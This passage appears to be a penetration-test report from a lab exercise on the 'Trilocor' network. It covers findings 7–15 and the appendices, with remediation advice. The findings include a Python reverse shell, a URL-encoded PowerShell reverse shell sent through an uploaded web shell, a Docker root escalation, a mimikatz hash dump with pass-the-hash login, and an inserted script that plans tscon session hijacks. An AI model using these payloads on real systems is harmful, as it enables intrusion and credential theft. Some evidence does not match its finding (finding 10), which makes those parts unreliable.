Now the attacker can use this payload to get RCE:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<< ATTACKER IP >>",<< ATTACKER PORT >>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")

We will receive a reverse shell as the srvadm user.

7. Docker Privilege Escalation SRVADM to ROOT - High

CWE: CWE-250: Execution with Unnecessary Privileges
CVSS 3.1: 8.8 / CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Root Cause: The user srvadm has been granted access to the Docker daemon through membership in the docker group. This configuration allows srvadm to execute Docker commands, including running containers with privileged access to the host system.
Impact: Privileged Container Execution: Using the Docker command provided (docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu:20.04 chroot /mnt bash), srvadm can launch a Docker container with the ability to access and modify the host filesystem. Potential Security Risks: Granting Docker access to a user with administrative privileges (srvadm) increases the risk of unauthorized system modifications, data breaches, and potential compromise of sensitive information.
Affected Component: WEB-NIX01
Remediation:
• Least Privilege Principle: Restrict Docker access to only those users who absolutely require it for their tasks.
• Container Security Best Practices: Implement Docker security best practices, such as using minimal images, applying least privilege principles within containers, and regularly updating Docker images.
• Monitor Docker Activities: Continuously monitor Docker activities and container deployments for any suspicious or unauthorized actions.
References: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#docker-group

Finding Evidence
The user srvadm is a member of the docker group. This allows him to use and control the Docker daemon:

docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu:20.04 chroot /mnt bash

8. Master Password Disclosure Via NFS share - Critical

CWE: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
CVSS 3.1: 9.3 / CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
Root Cause: The attacker identified an open mount point, allowing unauthorized access to sensitive files. Subsequently, they were able to discover the master password for the GlassFish server, potentially compromising its security.
Impact:
• Unauthorized Access: The discovery of an open mount point indicates a significant security oversight, potentially exposing critical system files to unauthorized users.
• Master Password Compromise: Obtaining the master password for the GlassFish server poses a severe security risk, allowing the attacker to gain full administrative control over the server and its associated resources.
Affected Component: 172.16.139.35
Remediation:
• Secure Configuration: Ensure all mount points are properly secured and access is restricted based on the principle of least privilege.
• Access Controls: Implement robust access controls and authentication mechanisms to prevent unauthorized access to sensitive files and resources.
• Encryption: Encrypt sensitive information such as passwords to mitigate the impact of unauthorized access.
• Regular Audits: Conduct regular security audits and vulnerability assessments to identify and remediate potential security weaknesses before they can be exploited.
References: -

Finding Evidence
The attacker discovered an open NFS mount.

The attacker is able to discover the master password for the GlassFish server.
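A check for the export configuration behind this finding, as an added example that is not from this report: it parses a constructed /etc/exports in the standard Linux NFS server format and flags every export that is open to any host, writable by any host, or carries the no_root_squash or insecure options. The file content and the paths in it are constructed for the example and are not the exports of 172.16.139.35.

```python
import re

# Constructed /etc/exports content; not taken from the engagement.
SAMPLE_EXPORTS = """\
# constructed sample
/srv/glassfish/config  *(rw,sync,no_root_squash)
/srv/backups           *(ro,sync)
/home/devshare         10.10.5.0/24(rw,sync,root_squash)
/srv/public            192.168.1.0/24(ro,sync) *(rw,insecure)
"""

EXPORT_RE = re.compile(r"^(\S+)\s+(.*)$")      # <path> <client(opts)> [<client(opts)> ...]
CLIENT_RE = re.compile(r"(\S+?)\((.*?)\)")     # one client(options) pair


def parse_exports(text: str):
    """Yield (path, client, options) for every client clause of every export line.
    Comments and blank lines are skipped; a client written without an option
    list is not matched, which is acceptable for an audit of explicit options."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = EXPORT_RE.match(line)
        if not m:
            continue
        path, rest = m.groups()
        for client, opts in CLIENT_RE.findall(rest):
            options = {o.strip() for o in opts.split(",") if o.strip()}
            yield path, client, options


def audit_exports(text: str):
    """Return a list of (path, client, issue) findings for risky export clauses."""
    findings = []
    for path, client, opts in parse_exports(text):
        if client == "*":
            findings.append((path, client, "exported to any host"))
        if "no_root_squash" in opts:
            findings.append((path, client, "no_root_squash: remote root maps to local root"))
        if "insecure" in opts:
            findings.append((path, client, "insecure: accepts clients on unprivileged ports"))
        if "rw" in opts and client == "*":
            findings.append((path, client, "world-writable export"))
    return findings


def risky_paths(text: str):
    """Sorted, de-duplicated list of exported paths with at least one finding."""
    return sorted({path for path, _, _ in audit_exports(text)})
```

On the sample, `/srv/glassfish/config` is flagged three times (any host, no_root_squash, world-writable), `/srv/backups` once, and `/srv/public` three times for its `*` clause; the subnet-restricted `/home/devshare` export produces no finding, which is the shape a remediated configuration should take.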

9. GlassFish server RCE - High

CWE: CWE-94: Improper Control of Generation of Code ('Code Injection')
CVSS 3.1: 8.4 / CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Root Cause: A Remote Code Execution (RCE) vulnerability in the GlassFish server allows attackers to execute arbitrary code on the server, leading to severe security risks.
Impact:
1. Complete Server Compromise: Full control over the server.
2. Data Breach: Unauthorized access to sensitive data.
Remediation: Update the GlassFish server to the latest version.
References: -

Finding Evidence
• From the previous RCE the attacker is able to set up tunneling using ligolo-ng and start internal enumeration.

• Log in as administrator on the GlassFish server with the master password found on the open mount.

• The administrator user can deploy pages; a malicious user can upload a web shell using this functionality.

• Download a web shell and zip the file:
zip -r cmd.war cmd.jsp

• Now the attacker can upload the file to the GlassFish server.

• Deploy and launch the file.

• Then the attacker can go to the file path and access the web shell from there.

• Now we can obtain a reverse shell from here:

172.16.139.35:8080/cmd/cmd.jsp?cmd=powershell+-nop+-c+"%24client+%3D+New-
Object+System.Net.Sockets.TCPClient('172.16.139.10'%2C443)%3B%24stream+%3D+
%24client.GetStream()%3B[byte[]]%24bytes+%3D+0..65535|%25{0}%3Bwhile((%24i+%3D+
%24stream.Read(%24bytes%2C+0%2C+%24bytes.Length))+-ne+0){%3B%24data+%3D+(New-Object+-
TypeName+System.Text.ASCIIEncoding).GetString(%24bytes%2C0%2C+%24i)%3B%24sendback+%3D+(iex+
%24data+2>%261+|+Out-String+)%3B%24sendback2+%3D+%24sendback+%2B+'PS+'+%2B+(pwd).Path+
%2B+'>+'%3B%24sendbyte+%3D+([text.encoding]
%3A%3AASCII).GetBytes(%24sendback2)%3B%24stream.Write(%24sendbyte%2C0%2C%24sendbyte.Length)
%3B%24stream.Flush()}%3B%24client.Close()"


10. Privilege Escalation via SeLoadDriverPrivilege Enabled - High

CWE: CWE-250: Execution with Unnecessary Privileges
CVSS 3.1: 7.5 / CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H
Root Cause: SeLoadDriverPrivilege is a Windows security privilege that allows a user to load and unload device drivers. Device drivers run at a high privilege level (kernel mode), which means that anyone with the ability to load a driver could potentially execute code with elevated privileges.
Impact:
• Privilege Escalation: Attackers can exploit SeLoadDriverPrivilege to load a malicious driver, thereby gaining kernel-level access to the system. This can lead to complete system compromise, allowing attackers to execute arbitrary code with the highest privileges.
• The attacker can escalate privileges to the Administrator user.
Remediation:
• Assign SeLoadDriverPrivilege only to trusted administrative accounts and services that require it. Avoid granting this privilege to standard user accounts.
• Implement Group Policy settings to restrict which accounts can load and unload drivers. Regularly review and update these policies to ensure they adhere to the principle of least privilege.
References: -

Finding Evidence
SeDebugPrivilege is enabled on the server.

The attacker has permission to migrate the process. The attacker can obtain a session in Metasploit and use the migrate module to escalate privileges.

The attacker can get an administrative shell by migrating the process.


11. SeDebugPrivilege Enabled - High

CWE: CWE-269: Improper Privilege Management
CVSS 3.1: 7.8 / CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Root Cause: The vulnerability stemming from enabling SeDebugPrivilege (Debug programs privilege) lies in its potential for privilege escalation if improperly managed. This privilege allows users to attach a debugger to any process on the system, which can be exploited by attackers to gain unauthorized access or manipulate processes.
Impact: The primary risk associated with SeDebugPrivilege is privilege escalation. By enabling this privilege, users can gain access to and manipulate processes running with higher privileges than their own. This can lead to complete compromise of the system if exploited by an attacker.
Remediation:
• Minimize Privilege Use: Ensure that SeDebugPrivilege is only assigned to accounts and services that absolutely require it for legitimate purposes. Avoid assigning it to standard user accounts.
• Restrict Access: Limit the assignment of SeDebugPrivilege to specific administrative accounts and system services that require it. Regular audits should verify this access control.
References: -

Finding Evidence
The attacker can use mimikatz to dump the SAM hashes:

.\mimikatz.exe privilege::debug lsadump::sam exit


  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::sam
Domain : MS01
SysKey : 90557b78f23225c40937c0791ad38df6
Local SID : S-1-5-21-4027693121-2049782792-260753726

SAMKey : d9cec4e96dbd975f8f1a35c1afbcbdee

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: b3a92ef[[ ]]7d7fd89

[[ SNIP ]]
mimikatz(commandline) # exit
Bye!

C:\Users\Public>


This led to privilege escalation to the Administrator user, and the attacker can log in using the hash.

The user's account has a restriction on RDP login. This restriction can be bypassed by disabling it through an evil-winrm login.

xfreerdp /v:172.16.139.35 /u:administrator /pth:'b3a92e[[ SNIP ]]7fd89' /cert:ignore /size:80%

12. Privilege Escalation via Login Session Hijacking - High

CWE: CWE-287: Improper Authentication
CVSS 3.1: 7.5 / CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H
Root Cause: Login Session Hijacking is a technique where an attacker gains control over another user's session, potentially escalating their privileges. In this scenario, the attacker (with administrative privileges) hijacks the session of another user logged into the system.
Impact:
• By hijacking the session of pthorp_adm, the attacker can potentially access resources and data that are accessible to this user but not to the original administrative account.
• The ability to interact with another user's session can lead to unauthorized access to sensitive information, applications, or network resources.
Remediation: Regularly audit and monitor user sessions using tools like query user and centralized logging solutions. Look for anomalies such as unexpected user logins or the creation of new services.
References: -

Finding Evidence
The query user command is used to list all users currently logged into the system. This reveals the presence of the pthorp_adm user session.

Using administrative privileges, the attacker creates a new service that executes a payload, potentially granting access to the pthorp_adm session or running code under this user's context.

Running net start <servicename> will give the session of pthorp_adm.

Attaching to the session prompted for the user's password, so the tester used the administrative privileges already obtained to change the password of pthorp_adm (this change is listed in Appendix A.6 for cleanup).

With the new password the tester was able to log in as pthorp_adm.
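The evidence above names the two commands (query user, net start) but not how the service hands over the session. The Python below, added here as an example and not tooling from the original report, shows the standard mechanism the finding is assumed to rely on: a service runs as SYSTEM, and SYSTEM can run tscon <id> /dest:<session> to attach another user's session to the attacker's own console. It parses a query user listing, picks the victim session, and emits the sc create / net start / sc delete lines. The query user text is constructed, not captured from the engagement; sesshijack is an assumed service name.

```python
"""Plan a tscon session hijack from `query user` output.

Added example, not tooling from the original report, which only states
that a service was created and started with net start. The mechanism
assumed here is the standard one: a service runs as SYSTEM, and SYSTEM can
run `tscon <id> /dest:<session>` to attach another user's session to the
attacker's own console without the target user's password. The sample
`query user` text is constructed, not captured from the engagement.
"""
import re

SAMPLE_QUERY_USER = """\
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>administrator         rdp-tcp#3           2  Active          .  6/1/2024 10:02 AM
 pthorp_adm            console             1  Active       1:05  6/1/2024 9:30 AM
 svc_glassfish                             3  Disc      2+03:14  5/31/2024 8:00 PM
"""

# One row of query user. SESSIONNAME is blank for disconnected sessions,
# and the row for the session we are running in is prefixed with '>'.
ROW_RE = re.compile(
    r"^(?P<cur>>?)\s*(?P<user>\S+)\s+(?:(?P<session>\S+)\s+)?(?P<id>\d+)\s+"
    r"(?P<state>Active|Disc|Listen)\s+(?P<idle>\S+)\s+(?P<logon>.*?)\s*$"
)


def parse_query_user(text):
    """Return one dict per session row; the header line does not match."""
    sessions = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            sessions.append({
                "user": m.group("user").lower(),
                "session": m.group("session"),  # None when disconnected
                "id": int(m.group("id")),
                "state": m.group("state"),
                "current": m.group("cur") == ">",
            })
    return sessions


def hijack_commands(sessions, target_user, service_name="sesshijack"):
    """cmd.exe lines that re-attach target_user's session to ours.

    Disconnected sessions are preferred: attaching to an Active one pulls
    the desktop away from a user who is sitting at it, which gets noticed.
    """
    mine = next((s for s in sessions if s["current"]), None)
    if mine is None or mine["session"] is None:
        raise RuntimeError("no attached session of our own to use as /dest")
    victims = [s for s in sessions if s["user"] == target_user.lower()]
    if not victims:
        raise LookupError(f"{target_user} has no session on this host")
    victim = sorted(victims, key=lambda s: s["state"] != "Disc")[0]
    tscon = f"tscon {victim['id']} /dest:{mine['session']}"
    return [
        # binpath= needs the space after '='; net start reports the service
        # as failing (cmd.exe is not a real service) but tscon has run by then.
        f'sc create {service_name} binpath= "cmd.exe /k {tscon}"',
        f"net start {service_name}",
        f"sc delete {service_name}",  # leave no stray service behind
    ]


if __name__ == "__main__":
    print("\n".join(hijack_commands(parse_query_user(SAMPLE_QUERY_USER),
                                    "pthorp_adm")))
```

The /dest value must be the attacker's own attached session (the '>' row); if that row has no session name the attacker is in a disconnected session and has nowhere to land the hijacked desktop, which the function reports instead of emitting a command that tscon would reject.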

13. Account Takeover via Plain Text Credentials on Sticky Notes - High

CWE TODO

CVSS 3.1 7.5 / CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Root Cause An attacker gains unauthorized access to an account by finding plain text credentials written in Sticky Notes. This scenario highlights a common but often overlooked weakness: users write down passwords or other sensitive information and leave them in easily accessible locations.

Impact 1. Unauthorized access: the attacker can gain unauthorized access to user accounts, potentially including accounts with privileged Active Directory access.
2. Data breach: once inside the system, the attacker can access sensitive data, leading to potential breaches of personal information, intellectual property, or other confidential information.
3. Privilege escalation: if the attacker gains access to a low-privilege account, they may attempt further exploits to escalate privileges within the system.

Remediation Regularly educate and train users on secure password practices, emphasizing the risks of writing down passwords and leaving them in accessible places. Note that Sticky Notes content is stored unencrypted in the user's profile (the plum.sqlite database under the app's LocalState folder), so a note is readable by anyone with access to that profile or its backups even when it is not on screen.

References -

Finding Evidence
After logging in as pthorp_adm, the tester found Sticky Notes on the desktop containing credentials.

The tester then logged in to the machine with these credentials.

14. Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService) - High

CWE -
CVE CVE-2021-44595

CVSS 3.1 8.8 / CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Root Cause An attacker exploits a known vulnerability in an outdated version of the Wondershare Dr.Fone application, whose ElevationService contains a privilege escalation flaw. This allows a local, low-privileged user to escalate to an administrative user on the system.

Impact The attacker gains administrative privileges, giving them complete control over the affected system.

Remediation Regularly update all software applications to their latest versions. Ensure that Wondershare Dr.Fone and similar applications are updated to versions that have patched known vulnerabilities. Where such a tool is not needed on a workstation, remove it rather than leaving its privileged helper service installed.

References -

Finding Evidence
Log in to the server using

On the desktop, several applications were installed; the Wondershare Dr.Fone installation was an old, vulnerable version (12.0.7).

The public exploit was transferred to the victim machine and run with Python, which returned a shell to the tester's netcat listener.

15. DNS zone transfer - Info

CWE CWE-402: Transmission of Private Resources into a New Sphere ('Resource Leak')

CVSS 3.1 0.0 / CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

Root Cause DNS zone transfers (AXFR) replicate DNS records from primary to secondary servers for redundancy. AXFR itself offers no authentication, so unless the server restricts who may request one, any client can ask for a copy of the entire zone, exposing internal naming information such as subdomains.

Impact Discovered subdomains (see Appendix A.3). A full host list for the domain gives an attacker many potential attack vectors.

Remediation Restrict zone transfers to the addresses of authorized secondary name servers (for example BIND's allow-transfer option, or the "Only to servers listed on the Name Servers tab" setting on Windows DNS) and, where supported, require TSIG-signed transfer requests.

References -

Finding Evidence
The tester ran the command

dig axfr trilocor.local @<ip>
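The dig command above either dumps the whole zone or prints "; Transfer failed.", and the records are only useful once the hostnames are pulled out of them. The Python below, added here as an example and not part of the report or of dig, parses a dig axfr transcript, checks that the answer is a complete transfer (a valid AXFR is bracketed by the zone's SOA record), and lists the names under the apex the way Appendix A.3 does. The transcript is constructed from the A.3 subdomains; the name server address, TTLs and host addresses are assumed.

```python
"""Check a `dig axfr` transcript and pull the hostnames out of it.

Added example, not from the original report. A successful AXFR answer is
bracketed by the zone's SOA record (first and last record); a refused
transfer prints "; Transfer failed." and no records. The transcript below
is constructed to match the finding, using the subdomains listed in
Appendix A.3 with assumed addresses and TTLs.
"""
import re

SAMPLE_AXFR = """\
; <<>> DiG 9.18.12 <<>> axfr trilocor.local @172.16.139.3
;; global options: +cmd
trilocor.local.          3600  IN  SOA    ns1.trilocor.local. hostmaster.trilocor.local. 2024120101 3600 900 604800 86400
trilocor.local.          3600  IN  NS     ns1.trilocor.local.
ns1.trilocor.local.      3600  IN  A      172.16.139.3
www.trilocor.local.      3600  IN  A      172.16.139.10
blog.trilocor.local.     3600  IN  CNAME  www.trilocor.local.
careers.trilocor.local.  3600  IN  A      172.16.139.10
remote.trilocor.local.   3600  IN  A      172.16.139.35
trilocor.local.          3600  IN  SOA    ns1.trilocor.local. hostmaster.trilocor.local. 2024120101 3600 900 604800 86400
;; Query time: 2 msec
;; SERVER: 172.16.139.3#53(172.16.139.3) (TCP)
;; XFR size: 8 records (messages 1, bytes 290)
"""

# What dig prints when the server refuses AXFR (constructed, same format).
SAMPLE_REFUSED = """\
; <<>> DiG 9.18.12 <<>> axfr trilocor.local @172.16.139.3
;; global options: +cmd
; Transfer failed.
"""

RR_RE = re.compile(r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+(?P<type>\S+)\s+(?P<data>.*)$")


def parse_axfr(text):
    """Return the resource records of a dig axfr transcript as dicts."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue  # dig comments, including the "Transfer failed." marker
        m = RR_RE.match(line)
        if m:
            records.append({
                "name": m.group("name").rstrip(".").lower(),
                "ttl": int(m.group("ttl")),
                "type": m.group("type"),
                "data": m.group("data"),
            })
    return records


def transfer_succeeded(records):
    """A complete AXFR starts and ends with the same zone's SOA record."""
    return (len(records) >= 2
            and records[0]["type"] == "SOA"
            and records[-1]["type"] == "SOA"
            and records[0]["name"] == records[-1]["name"])


def hostnames(records, zone):
    """Unique names below the apex, sorted: the Appendix A.3 style list."""
    zone = zone.rstrip(".").lower()
    return sorted({r["name"] for r in records
                   if r["name"] != zone and r["name"].endswith("." + zone)})


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    print("complete transfer:", transfer_succeeded(recs))
    print("\n".join(hostnames(recs, "trilocor.local")))
```

After the zone is locked down, running the same dig command and feeding it through parse_axfr should yield no records at all, which is the retest for this finding.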

A Appendix

A.1 Finding Severities

Each finding has been assigned a severity rating of critical, high, medium, low or info. The rating is based on an assessment of the priority with which each finding should be viewed and the potential impact each has on the confidentiality, integrity, and availability of Trilocor's data.

Rating     CVSS Score Range
Critical   9.0 – 10.0
High       7.0 – 8.9
Medium     4.0 – 6.9
Low        0.1 – 3.9
Info       0.0

A.2 Host & Service Discovery

IP Address       Port                  Service               Notes
10.129.191.44    80,7777               wordpress, Werkzeug
172.16.139.10    80,7777
172.16.139.3     88
172.16.139.35    139,2024,4848,8080
172.16.139.175
172.16.210.5     88,139,445
172.16.210.21    8080
172.16.210.34    8084,873

A.3 Subdomain Discovery

URL                                 Description                 Discovery Method
www.trilocor.local                  Trilocor main page
blog.trilocor.local                 Blog                        Zone transfer
careers.trilocor.local              Trilocor - Job Portal       Zone transfer
dev.trilocor.local                  UAT                         Zone transfer
portal.trilocor.local               Human Resources login       Zone transfer
pr.trilocor.local                   Trilocor Public Relations   Zone transfer
remote.trilocor.local               VPN                         Zone transfer
store.trilocor.local                TRILOCOR Shop               Zone transfer
securetransfer-dev.trilocor.local   UAT                         Directory fuzzing
osticketapp.trilocor.local          UAT                         Source code
gogsusdev01.trilocor.local          UAT                         Ticket generation
uat01-eu.intranet.trilocor.local    UAT                         From repositories

A.4 Exploited Hosts

Host        Scope                        Method                           Notes
WEB-NIX01   Public Facing                SQLi
MS01        Internal                     Privileges
WS01        Internal                     ACL abuse
DC01        Internal Domain Controller   DCSync
DC02        Internal AD Cross Forest     Cross forest Kerberoast attack
ADMIN01     Internal AD                  Connected web
BACKUP01    linux

A.5 Compromised Users

Username                     Type               Method                           Notes
www-data                     linux              SQLi
websvc                       linux              vulnerable API
srvadm                       linux              Werkzeug
root                         linux              Docker
MS01\svc_glassfish           windows            glassfish server
MS01\Administrator           windows            hash dump
MS01\pthorp_adm              windows            session hijack
WS01\devtest                 windows            sticky note
WS01\administrator           windows            wondershare
trilocor\PTHORPE             Active Directory   clear text password
trilocor\JFLEMMING           Active Directory   phishing using open share
trilocor\KSALINAS            Active Directory   kerberoast attack
trilocor\SVC_TRILOCORSYNC    Active Directory   weak password for psafe3 file
trilocor\ADMINISTRATOR       Active Directory   WriteDACL abuse
trilocorai\svc_datakeeper    Active Directory   domain trust
trilocorai\svc_veracrypt     Active Directory   event log
trilocorai\administrator     Active Directory   privileges
ADMIN01\administrator        windows            command execution

A.6 Changes/Host Cleanup

Host                    Scope     Change/Cleanup Needed
ADMIN01\administrator   ADMIN01   Password changed
MS01\pthorp_adm         MS01      Password changed

A.7 Flags Discovered

Flag #   Host           Flag Location   Flag Value                         Method Used
1.       c8601dccf970   /home           67e21d845ce5279a2eb870fca1787afe   SQLi
2.       WEB-NIX01      /home/websvc    35c306ef686049266dd53065ba0dcb96   API
3.       WEB-NIX01      /home/srvadm    43f40c9c680bb5ac7cfbdcce3136ae5f   Werkzeug
4.       WEB-NIX01      /root           83dadb7c6d53508d02b089efc3182167   Docker
5.       MS01           Desktop         0b934e5f65ace7c003a75e8698201800   glassfish server
6.       MS01           Desktop         775e8603841fe0ca6447e7a4f6ec23ed   SeLoadDriverPrivilege
7.       WS01           Desktop         e70a024080d44f7ae2bb68c0ede033f9   session hijacking
8.       WS01           Desktop         54db41fea7f42a7a35dd350091174bd9   weak password for psafe3 file
9.       DC01           Desktop         f8e8731142c94e63ea6aac49b5ad359b   DCSync
10.      DC02           Desktop         eb50b7f93b26874c5b66294f17771523   cross forest trust
11.      DC02           Desktop         25d36e1585c43ed40fe6a1b8f4111dbf   privileges
12.      ADMIN01        Desktop         2d06668165cc471db7a415b7badd1aaa   web exploitation

End of Report

This report was rendered by SysReptor with